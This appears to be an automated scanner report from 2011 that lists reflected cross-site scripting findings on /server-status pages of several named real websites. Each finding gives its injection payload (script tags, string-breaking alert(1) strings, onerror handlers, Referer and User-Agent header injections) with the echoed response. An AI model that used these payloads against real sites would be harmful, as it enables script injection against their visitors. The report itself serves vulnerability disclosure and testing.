Date: Sat, 02 Apr 2011 11:49:47 GMT
Server: Apache/2.2.8 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 293
<html><body><b>The page you requested:<br/><i>www.schoolfusion.us/server-status1d661<script>alert(1)</script>a9d3e1ed519</i><br/> does not exist on www.schoolfusion.us<br />Please click <a href='http: ...[SNIP]...
2.49. http://www.stltoday.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.stltoday.com
Path: /server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 287fc-->40f7fe6d0fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a29f"%3balert(1)//3200f220976 was submitted in the REST URL parameter 1. This input was echoed as 5a29f";alert(1)//3200f220976 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe50"><script>alert(1)</script>a72918afc84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1503"><script>alert(1)</script>dfa9e07acd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8652a'-alert(1)-'6b8ddda77f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4043e'-alert(1)-'59bd963696c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.55. http://www.trails.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.trails.com
Path: /server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccffb'-alert(1)-'ebdf6f8cd45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.56. http://www.travelpod.com/server-status [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.travelpod.com
Path: /server-status
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867ac"><script>alert(1)</script>9a40fad7fa4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.57. http://www.uscellular.com/server-status [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.uscellular.com
Path: /server-status
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 37f63</script><script>alert(1)</script>7bc3bb8d3e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head>
<! ...[SNIP]... <SCRIPT type="text/javascript">
function go() { //alert("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status37f63</script><script>alert(1)</script>7bc3bb8d3e1"); var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status37f63</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6218b"%3balert(1)//9c7ae4c25c7 was submitted in the REST URL parameter 1. This input was echoed as 6218b";alert(1)//9c7ae4c25c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head>
<! ...[SNIP]... server-status6218b";alert(1)//9c7ae4c25c7"); var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status6218b";alert(1)//9c7ae4c25c7") //alert(URL); window.open(URL,"",'width='+screen.width+',height='+screen.height+',toolbar=0,location=0,directories=0,status=0,menuBar=0,scrollBars=1,resizable=0');
} </SCRIPT> ...[SNIP]...
2.59. http://www.uscellular.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.uscellular.com
Path: /server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2130"-alert(1)-"e75eaee9692 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head>
<! ...[SNIP]... er-status&b2130"-alert(1)-"e75eaee9692=1"); var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status&b2130"-alert(1)-"e75eaee9692=1") //alert(URL); window.open(URL,"",'width='+screen.width+',height='+screen.height+',toolbar=0,location=0,directories=0,status=0,menuBar=0,scrollBars=1,resizable=0');
} </SCRIPT> ...[SNIP]...
2.60. http://www.uscellular.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.uscellular.com
Path: /server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload fe658</script><script>alert(1)</script>d0b2b654cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head>
<! ...[SNIP]... <SCRIPT type="text/javascript">
function go() { //alert("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status&fe658</script><script>alert(1)</script>d0b2b654cd4=1"); var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status&fe658</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41715"><script>alert(1)</script>3fd18ffdef9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d0c"><script>alert(1)</script>ee53c632335 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5bb61<img%20src%3da%20onerror%3dalert(1)>7a93292b75c was submitted in the REST URL parameter 1. This input was echoed as 5bb61<img src=a onerror=alert(1)>7a93292b75c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
<html> <head><title>URL Not Found</title></head> <body> <h1>URL Not Found</h1> <b>http://www.washington.edu/server-status5bb61<img src=a onerror=alert(1)>7a93292b75c</b> was not found or is no l ...[SNIP]... <br> Reason: File does not exist: /www/world/server-status5bb61<img src=a onerror=alert(1)>7a93292b75c.</br> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12b0e'%3bf60efb54809 was submitted in the REST URL parameter 1. This input was echoed as 12b0e';f60efb54809 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b57fd"%3b663579dee14 was submitted in the REST URL parameter 1. This input was echoed as b57fd";663579dee14 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into an HTML comment. The payload a46fa--><script>alert(1)</script>0e7a0f0b634 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d885<script>alert(1)</script>591960a3e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec56"><a>ec84848f36a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
2.69. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.wisc.edu
Path: /server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 167b7<script>alert(1)</script>b2de78620af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:59:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http- ...[SNIP]... <strong>/server-status?167b7<script>alert(1)</script>b2de78620af=1</strong> ...[SNIP]...
2.70. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.wisc.edu
Path: /server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c4798--><script>alert(1)</script>6e746355b62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:59:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19747
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http- ...[SNIP]... <!--(http://www.wisc.edu/server-status?c4798--><script>alert(1)</script>6e746355b62=1)--> ...[SNIP]...
2.71. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.wisc.edu
Path: /server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68eb7"><a>84482eb936a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb3b"><script>alert(1)</script>3f0642751f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f521a"><a>d2276860312 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8da4"><script>alert(1)</script>eaff8ad27c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 351ad<script>alert(1)</script>1156cf6eab3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1b7"><script>alert(1)</script>8b8c2a2c524 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea48"-alert(1)-"7097f65fc20 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f095"-alert(1)-"fb200d763f9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8c2"><script>alert(1)</script>d850478623 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d861d"><a>dfba8ebd5bd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <me ...[SNIP]... //adlog.com.com/adlog/i/r=6455&sg=1815&o=10%253A&h=cn&p=&b=2&l=&site=2&pt=2000&nd=10&pid=&cid=0&pp=100&e=&rqid=01c13-ad-e5:4D97098A3A6B2&orh=d861d"><a>dfba8ebd5bd&ort=&oepartner=&epartner=&ppartner=&pdom=d861d"> ...[SNIP]...
2.81. http://www.townhall.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.townhall.com
Path: /server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4506f"><script>alert(1)</script>653e01c4ef5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/server-status?4506f"><script>alert(1)</script>653e01c4ef5=1">http://townhall.com/server-status?4506f" ...[SNIP]...
2.82. http://www.townhall.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.townhall.com
Path: /server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 98322<script>alert(1)</script>4f731bc80bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/server-status?98322<script>alert(1)</script>4f731bc80bc=1">http://townhall.com/server-status?98322<script>alert(1)</script>4f731bc80bc=1</a> ...[SNIP]...
Report generated by XSS.CX at Sat Apr 02 07:42:05 CDT 2011.